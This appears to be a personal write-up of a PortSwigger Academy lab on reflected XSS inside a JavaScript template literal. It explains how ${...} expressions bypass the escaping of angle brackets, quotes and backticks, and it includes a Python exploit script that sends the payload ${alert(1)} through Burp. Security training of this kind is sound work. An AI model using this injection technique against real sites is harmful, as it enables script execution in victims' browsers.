Shubham Ranpise

Back

XSS Lab 21

Reflected XSS into a template literal with angle brackets, quotes and backticks escaped

portswigger-labs content

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped#

This lab demonstrates a reflected cross-site scripting (XSS) vulnerability where the user input is reflected inside a JavaScript template literal. Angle brackets and single/double quotes are HTML-encoded by the application, and backticks are escaped (Unicode-escaped), but an attacker can still inject an expression into the template literal using the ${...} syntax. By injecting ${alert(1)} into the search parameter and replaying the request (for example via Burp Repeater), the expression executes when the template literal is evaluated in the browser, resulting in a JavaScript alert.

How Exploit Works#

  • The search parameter is reflected inside a JavaScript template literal on the page.
  • Angle brackets and quotes are HTML-encoded and backticks are escaped, but template literal expression syntax ${...} still evaluates when the template is interpreted.
  • Submit a benign search string, intercept the request with Burp, and replace the search value with ${alert(1)}.
  • Loading the resulting URL executes the injected expression inside the template literal and triggers the alert.
  • Verify success by copying the URL from Burp and opening it directly in the browser.

Usage#

python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmd

Exploit#

exploit.py
import requests
import sys
import urllib3

# Disable SSL warnings for Burp Suite
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set Burp Suite proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

def check_burp():
    # Check if Burp Suite is running and listening on the configured proxy.

    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)

def exploit_xss(url, payload):
    # Exploit XSS in search parameter.
        uri = f"/?search={payload}"
        res = requests.get(url + uri, verify=False, proxies=proxies)
        res.raise_for_status()
        session = requests.Session()
        res = session.get(url, verify=False, proxies=proxies)
        if "Congratulations" in res.text:
            print("[+] Lab solved 🎉")
            return True
        else:
            print("[-] lab not solved.")

def main():
    # Entry point of the script.

    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        print(f"Example: python {sys.argv[0]} https://example.com")
        sys.exit(1)

    url = sys.argv[1].strip()

    # Step 1: Check Burp Suite
    check_burp()

    # Step 2: Define XSS payload
    payload = '${alert(1)}'

    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
python

See more portswigger-labs